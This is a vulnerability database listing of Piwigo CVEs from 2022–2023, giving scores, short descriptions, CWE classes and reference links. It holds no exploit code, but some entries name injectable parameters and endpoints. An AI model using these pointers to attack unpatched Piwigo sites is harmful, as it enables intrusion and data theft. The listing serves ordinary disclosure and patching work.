CVSS: 5.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-33359
https://notcve.org/view.php?id=CVE-2023-33359
23 May 2023 — Piwigo 13.6.0 is vulnerable to Cross Site Request Forgery (CSRF) in the "add tags" function. • https://github.com/Piwigo/Piwigo/issues/1908 • CWE-352: Cross-Site Request Forgery (CSRF) •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-33361
https://notcve.org/view.php?id=CVE-2023-33361
23 May 2023 — Piwigo 13.6.0 is vulnerable to SQL Injection via /admin/permalinks.php. • https://github.com/Piwigo/Piwigo/issues/1910 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-33362
https://notcve.org/view.php?id=CVE-2023-33362
23 May 2023 — Piwigo 13.6.0 is vulnerable to SQL Injection via in the "profile" function. • https://github.com/Piwigo/Piwigo/issues/1911 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.0EPSS: 0%CPEs: 1EXPL: 1CVE-2023-27233
https://notcve.org/view.php?id=CVE-2023-27233
17 May 2023 — Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php. • https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.0EPSS: 37%CPEs: 1EXPL: 3CVE-2023-26876 – Piwigo CVE-2023-26876 Gather Credentials via SQL Injection
https://notcve.org/view.php?id=CVE-2023-26876
21 Apr 2023 — SQL injection vulnerability found in Piwigo v.13.5.0 and before allows a remote attacker to execute arbitrary code via the filter_user_id parameter to the admin.php?page=history&filter_image_id=&filter_user_id endpoint. Piwigo version 13.5.0 suffers from a remote SQL injection vulnerability. • https://packetstorm.news/files/id/172059 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 5.5EPSS: 0%CPEs: 1EXPL: 1CVE-2022-48007
https://notcve.org/view.php?id=CVE-2022-48007
27 Jan 2023 — A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent. Una vulnerabilidad de cross-site scripting (XSS) almacenado en identification.php de Piwigo v13.4.0 permite a los atacantes ejecutar scripts web o HTML de su elección a través de un payload manipulado inyectado en el User-Agent. • https://github.com/Piwigo/Piwigo/issues/1835 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2014-125053 – Piwigo-Guest-Book Navigation Bar guestbook.inc.php sql injection
https://notcve.org/view.php?id=CVE-2014-125053
06 Jan 2023 — A vulnerability was found in Piwigo-Guest-Book up to 1.3.0. It has been declared as critical. This vulnerability affects unknown code of the file include/guestbook.inc.php of the component Navigation Bar. The manipulation of the argument start leads to sql injection. Upgrading to version 1.3.1 is able to address this issue. • https://github.com/Piwigo/Piwigo-Guest-Book/commit/0cdd1c388edf15089c3a7541cefe7756e560581d • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 6.4EPSS: 0%CPEs: 1EXPL: 1CVE-2022-37183
https://notcve.org/view.php?id=CVE-2022-37183
31 Aug 2022 — Piwigo 12.3.0 is vulnerable to Cross Site Scripting (XSS) via /search/1940/created-monthly-list. Piwigo versión 12.3.0, es vulnerable a un ataque de tipo Cross Site Scripting (XSS) por medio de /search/1940/created-monthly-list • https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Piwigo/2022/12.3.0 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 1CVE-2022-32297
https://notcve.org/view.php?id=CVE-2022-32297
14 Jul 2022 — Piwigo v12.2.0 was discovered to contain SQL injection vulnerability via the Search function. Se ha detectado que Piwigo versión v12.2.0, contiene una vulnerabilidad de inyección SQL por medio de la función Search • https://github.com/sth276/research/blob/main/piwigo_vul/Second-Order%20SQL%20Injection%20Vulnerabilities%20in%20Piwigo.md • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 8.8EPSS: 2%CPEs: 1EXPL: 1CVE-2021-40553
https://notcve.org/view.php?id=CVE-2021-40553
28 Jun 2022 — piwigo 11.5.0 is affected by a remote code execution (RCE) vulnerability in the LocalFiles Editor. piwigo versión 11.5.0, está afectado por una vulnerabilidad de ejecución de código remota (RCE) en el Editor de Archivos Locales • https://github.com/Yang9999999/vuln/blob/main/README.md • CWE-94: Improper Control of Generation of Code ('Code Injection') •